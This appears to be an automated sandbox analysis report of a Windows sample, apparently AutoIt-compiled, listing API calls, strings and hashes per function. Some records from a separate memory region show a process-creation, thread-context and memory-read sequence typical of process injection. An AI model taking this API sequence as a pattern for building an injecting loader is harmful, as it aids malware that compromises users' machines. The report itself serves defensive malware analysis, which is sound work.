                                          • RegisterClassExW.USER32(00000030), ref: 00DF309E
                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00DF30AF
                                          • InitCommonControlsEx.COMCTL32(?), ref: 00DF30CC
                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00DF30DC
                                          • LoadIconW.USER32(000000A9), ref: 00DF30F2
                                          • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00DF3101
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                          • API String ID: 2914291525-1005189915
                                          • Opcode ID: 84fb91b729f7a663e94f3d00c41b44491829ac07f9c1dc3b17efe2cfe0c8026e
                                          • Instruction ID: 1facc8c751997f88d3410c0aaa7d3d3026cdb88c2d8f7d2f04fa84a4c8331199
                                          • Opcode Fuzzy Hash: 84fb91b729f7a663e94f3d00c41b44491829ac07f9c1dc3b17efe2cfe0c8026e
                                          • Instruction Fuzzy Hash: F121C9B1950218AFDF04DF95EC49B9EBBF4FB08710F00822AF514B62A0D7B54588CF95

                                          Control-flow Graph

                                          APIs
                                            • Part of subcall function 00DF4864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00EB62F8,?,00DF37C0,?), ref: 00DF4882
                                            • Part of subcall function 00E1074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00DF72C5), ref: 00E10771
                                          • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00DF7308
                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00E2ECF1
                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00E2ED32
                                          • RegCloseKey.ADVAPI32(?), ref: 00E2ED70
                                          • _wcscat.LIBCMT ref: 00E2EDC9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                          • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                          • API String ID: 2673923337-2727554177
                                          • Opcode ID: 1332aa0f6c74c6464651bf4cf7a64fc3b87e12c1999e09b496a56e1909e77ec3
                                          • Instruction ID: b63b925f99c814a655a461c55f65119e1dd6d186c2ff5f8cb41dff7a87a9f050
                                          • Opcode Fuzzy Hash: 1332aa0f6c74c6464651bf4cf7a64fc3b87e12c1999e09b496a56e1909e77ec3
                                          • Instruction Fuzzy Hash: 6A7183B14083159EC714EF66EC819ABB7E8FF98340F45552EF585B32B0DB709948CBA1

                                          Control-flow Graph

                                          APIs
                                          • DefWindowProcW.USER32(?,?,?,?), ref: 00DF36D2
                                          • KillTimer.USER32(?,00000001), ref: 00DF36FC
                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00DF371F
                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00DF372A
                                          • CreatePopupMenu.USER32 ref: 00DF373E
                                          • PostQuitMessage.USER32(00000000), ref: 00DF375F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                          • String ID: TaskbarCreated$%
                                          • API String ID: 129472671-3835587964
                                          • Opcode ID: 3b8c1d637d26c91a4df85d635c1c75261586c2397a785caf9aead5250504168b
                                          • Instruction ID: d15aff9300e91c88b610e0ebb881c58d1f9c6ce7b3bc4d5198f977efcf455fd3
                                          • Opcode Fuzzy Hash: 3b8c1d637d26c91a4df85d635c1c75261586c2397a785caf9aead5250504168b
                                          • Instruction Fuzzy Hash: 8941F5B220410DBFDB18BB68EC0AB7A3795EB40301F175229F742F62E1DA64DE549271

                                          Control-flow Graph

                                          APIs
                                          • GetSysColorBrush.USER32(0000000F), ref: 00DF3A62
                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00DF3A71
                                          • LoadIconW.USER32(00000063), ref: 00DF3A88
                                          • LoadIconW.USER32(000000A4), ref: 00DF3A9A
                                          • LoadIconW.USER32(000000A2), ref: 00DF3AAC
                                          • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00DF3AD2
                                          • RegisterClassExW.USER32(?), ref: 00DF3B28
                                            • Part of subcall function 00DF3041: GetSysColorBrush.USER32(0000000F), ref: 00DF3074
                                            • Part of subcall function 00DF3041: RegisterClassExW.USER32(00000030), ref: 00DF309E
                                            • Part of subcall function 00DF3041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00DF30AF
                                            • Part of subcall function 00DF3041: InitCommonControlsEx.COMCTL32(?), ref: 00DF30CC
                                            • Part of subcall function 00DF3041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00DF30DC
                                            • Part of subcall function 00DF3041: LoadIconW.USER32(000000A9), ref: 00DF30F2
                                            • Part of subcall function 00DF3041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00DF3101
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                          • String ID: #$0$AutoIt v3
                                          • API String ID: 423443420-4155596026
                                          • Opcode ID: 8244543d7f8f83b89b8a121d2ce896986473fd01658910baf496fc1f5f2cec68
                                          • Instruction ID: 2400422e1bc8f6b8800e7d2eb75910e611499790815a2629c0cc890e9a184caa
                                          • Opcode Fuzzy Hash: 8244543d7f8f83b89b8a121d2ce896986473fd01658910baf496fc1f5f2cec68
                                          • Instruction Fuzzy Hash: 07212171D10308AFEB15DFA6EC05BAE7BB4FB08711F00422AF604B62B0D7B95A588F54

                                          Control-flow Graph

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                          • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$b
                                          • API String ID: 1825951767-3834736419
                                          • Opcode ID: 8f4ff41ee988a898dd42b2e03b4987cc1a3fc814be3363cb7fafc91fc9dbe406
                                          • Instruction ID: 55273c63e5cf0c98ef7a5634a69193d7faa78b0eb63c5397a8358c5900d5e39f
                                          • Opcode Fuzzy Hash: 8f4ff41ee988a898dd42b2e03b4987cc1a3fc814be3363cb7fafc91fc9dbe406
                                          • Instruction Fuzzy Hash: 00A14C7191022D9ADB04EBA0DC91AFEB778FF14300F468529F616B7191DB74AA49CB70

                                          Control-flow Graph

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: NULL Pointer assignment$Not an Object type
                                          • API String ID: 0-572801152
                                          • Opcode ID: f68dcbb90d21479e1fcda8477fbaabfcba211961d0a13c33ece2b3ec9c1260c2
                                          • Instruction ID: 15e23fb65e470309a2ce1ea652ac2b1a445a57d831bd2848d5c5cb389f2c46b4
                                          • Opcode Fuzzy Hash: f68dcbb90d21479e1fcda8477fbaabfcba211961d0a13c33ece2b3ec9c1260c2
                                          • Instruction Fuzzy Hash: AFC1B1B1E4020A9FDF10CF68E884AAEB7F9FB48354F149429E915FB281D770AD45CB51

                                          Control-flow Graph

                                          APIs
                                            • Part of subcall function 00E103A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00E103D3
                                            • Part of subcall function 00E103A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 00E103DB
                                            • Part of subcall function 00E103A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00E103E6
                                            • Part of subcall function 00E103A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00E103F1
                                            • Part of subcall function 00E103A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 00E103F9
                                            • Part of subcall function 00E103A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 00E10401
                                            • Part of subcall function 00E06259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00DFFA90), ref: 00E062B4
                                          • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00DFFB2D
                                          • OleInitialize.OLE32(00000000), ref: 00DFFBAA
                                          • CloseHandle.KERNEL32(00000000), ref: 00E349F2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                          • String ID: <g$\d$%$c
                                          • API String ID: 1986988660-619945097
                                          • Opcode ID: ec878fd39a8c4c2fd804e7fe3590fc7636ef087e2340f1d13ea7cf375a3d9715
                                          • Instruction ID: c4690c2a4e88064ffc323252f61ea1c670a937835b93fd018189e61e218ad3fd
                                          • Opcode Fuzzy Hash: ec878fd39a8c4c2fd804e7fe3590fc7636ef087e2340f1d13ea7cf375a3d9715
                                          • Instruction Fuzzy Hash: 3D81BCB1901A508FC794EF2BE9566677BE4FB88308310963AD128F7272EB39444D8F61

                                          Control-flow Graph

                                          APIs
                                          • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00FF2691
                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00FF28B7
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1690070618.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_ff0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: CreateFileFreeVirtual
                                          • String ID:
                                          • API String ID: 204039940-0
                                          • Opcode ID: ed516440ab75e0c1ded8a7b1870b24392b753ad5cf7d4aa929dd61e32643855c
                                          • Instruction ID: f3f059ebe09de6b5709b97ac44c2aa3e5a32fbf1e355885269fc62e617a72d17
                                          • Opcode Fuzzy Hash: ed516440ab75e0c1ded8a7b1870b24392b753ad5cf7d4aa929dd61e32643855c
                                          • Instruction Fuzzy Hash: 7BA11775E0020CEBDB54DFA4C894BBEB7B5BF48314F208159E601BB290D7799A41EFA4

                                          Control-flow Graph

                                          APIs
                                          • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00DF3A15
                                          • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00DF3A36
                                          • ShowWindow.USER32(00000000,?,?), ref: 00DF3A4A
                                          • ShowWindow.USER32(00000000,?,?), ref: 00DF3A53
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Window$CreateShow
                                          • String ID: AutoIt v3$edit
                                          • API String ID: 1584632944-3779509399
                                          • Opcode ID: 3718a9f356e7679145cf7d5cd53d6ce07ef35d0a42ec6767d1509a7a6a91d1d0
                                          • Instruction ID: 0e57dba942f2a52cf399caa9628368959c1302b5167c26580fae37407be9aa20
                                          • Opcode Fuzzy Hash: 3718a9f356e7679145cf7d5cd53d6ce07ef35d0a42ec6767d1509a7a6a91d1d0
                                          • Instruction Fuzzy Hash: 80F0DA716412907EFA3157276C49E772E7DD7C6F50B00422AFA04B6270C6A91855DAB0
                                          APIs
                                            • Part of subcall function 00FF22A0: Sleep.KERNELBASE(000001F4), ref: 00FF22B1
                                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00FF24B9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1690070618.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_ff0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: CreateFileSleep
                                          • String ID: U4NPLTMSLN
                                          • API String ID: 2694422964-2945274439
                                          • Opcode ID: b931587d2ea28876fae88fbe9798d4036c0206a5872a812bc96cef6074a43857
                                          • Instruction ID: c2bb3350ceddae0e6c5d5fc377ec12c3aad3390eb33dcda5a0db80e2568a66f1
                                          • Opcode Fuzzy Hash: b931587d2ea28876fae88fbe9798d4036c0206a5872a812bc96cef6074a43857
                                          • Instruction Fuzzy Hash: 04517D71D1424DEBEF20DBE4C815BEEBB78AF58300F1041A9A709BB2D0D6791B44DBA5
                                          APIs
                                          • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00E2D5EC
                                            • Part of subcall function 00DF7D2C: _memmove.LIBCMT ref: 00DF7D66
                                          • _memset.LIBCMT ref: 00DF418D
                                          • _wcscpy.LIBCMT ref: 00DF41E1
                                          • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00DF41F1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                           • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                          • String ID: Line:
                                          • API String ID: 3942752672-1585850449
                                          • Opcode ID: 4e8b1383b58064811a2fd690a215bae9fe29928f05377aa510cbfe8241a2b944
                                          • Instruction ID: 7441415a9f4a5c7751440eab7417de04a45ae480a796bff65e30711e85d520c2
                                          • Opcode Fuzzy Hash: 4e8b1383b58064811a2fd690a215bae9fe29928f05377aa510cbfe8241a2b944
                                          • Instruction Fuzzy Hash: 3631B3710083189EE721EB60EC45FEB77E8AF55300F15861EF295A20A1EB74A648C7B6
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                           • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                          • String ID:
                                          • API String ID: 1559183368-0
                                          • Opcode ID: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                                          • Instruction ID: c43f1bda45d39a0553cc38a20102f1f5c3880e2b42c3399b36ba8f62eb5bc185
                                          • Opcode Fuzzy Hash: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                                          • Instruction Fuzzy Hash: 9251B372A00B05DFDB249F79C8856EE77A5AF80324F64972AF835B62D0D7709DD08B80
                                          APIs
                                          • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E4758C,80070057,?,?,?,00E4799D), ref: 00E4766F
                                          • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E4758C,80070057,?,?), ref: 00E4768A
                                          • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E4758C,80070057,?,?), ref: 00E47698
                                          • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E4758C,80070057,?), ref: 00E476A8
                                          • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E4758C,80070057,?,?), ref: 00E476B4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                           • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: From$Prog$FreeStringTasklstrcmpi
                                          • String ID:
                                          • API String ID: 3897988419-0
                                          • Opcode ID: 66ac778c42a7aa14c6639086be75d3400b364568701e5eaeb16f459abde653f1
                                          • Instruction ID: 53b1eba8a386c19fe8036168bead9219992e9c3939d324c0902e3e2e76537391
                                          • Opcode Fuzzy Hash: 66ac778c42a7aa14c6639086be75d3400b364568701e5eaeb16f459abde653f1
                                          • Instruction Fuzzy Hash: 9901B1B2604614BFEB108F19EC04AAA7FAEEF44751F150068FD48E2211EB31DD4487E0
                                          APIs
                                            • Part of subcall function 00DF4F3D: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00EB62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00DF4F6F
                                          • _free.LIBCMT ref: 00E2E68C
                                          • _free.LIBCMT ref: 00E2E6D3
                                            • Part of subcall function 00DF6BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00DF6D0D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                           • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: _free$CurrentDirectoryLibraryLoad
                                          • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                          • API String ID: 2861923089-1757145024
                                          • Opcode ID: 2f7de4d1db31e9ea6f87c79634c0c4746059917a18b7ce1eaf53950bc3bf4046
                                          • Instruction ID: 5207fe9298b0244aea691a7f5f2db65cf32a75299995d7d4300af5cac969a02c
                                          • Opcode Fuzzy Hash: 2f7de4d1db31e9ea6f87c79634c0c4746059917a18b7ce1eaf53950bc3bf4046
                                          • Instruction Fuzzy Hash: A8918D71910229AFCF04EFA4E8919EDB7B4FF18314F14946AF915BB291EB30A945CB60
                                          APIs
                                          • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00DF35A1,SwapMouseButtons,00000004,?), ref: 00DF35D4
                                          • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00DF35A1,SwapMouseButtons,00000004,?,?,?,?,00DF2754), ref: 00DF35F5
                                          • RegCloseKey.KERNELBASE(00000000,?,?,00DF35A1,SwapMouseButtons,00000004,?,?,?,?,00DF2754), ref: 00DF3617
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                           • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: CloseOpenQueryValue
                                          • String ID: Control Panel\Mouse
                                          • API String ID: 3677997916-824357125
                                          • Opcode ID: f6d1b6b9ff74f834a5f465b076e696d531ba66f3069fa1c7a26488ee76039487
                                          • Instruction ID: 32ba80a2f5ed131cb4ced65aec5ca90a1c363a290fcdc3713b7b33bab66cb3f9
                                          • Opcode Fuzzy Hash: f6d1b6b9ff74f834a5f465b076e696d531ba66f3069fa1c7a26488ee76039487
                                          • Instruction Fuzzy Hash: 1811457161020CBFDF20CF65DC80ABEBBB8EF04740F028469E909E7210E271DE449BA0
                                          APIs
                                          • CreateProcessW.KERNELBASE(?,00000000), ref: 00FF1A5B
                                          • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00FF1AF1
                                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00FF1B13
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1690070618.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_ff0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Process$ContextCreateMemoryReadThreadWow64
                                          • String ID:
                                          • API String ID: 2438371351-0
                                          • Opcode ID: 4a62210935fbc19ac52c28b7856ac9112c9a9e608a38d15f0a7da1a89c903d0f
                                          • Instruction ID: 0e598af44ad98f44305afe1055bea19114cba3979b6a8293ba3e1f5dc4b70b73
                                          • Opcode Fuzzy Hash: 4a62210935fbc19ac52c28b7856ac9112c9a9e608a38d15f0a7da1a89c903d0f
                                          • Instruction Fuzzy Hash: 4662FE30A14258DBEB24CBA4C850BEEB371FF58700F1091A9D20DEB3A4E7759E81DB59
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                           • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
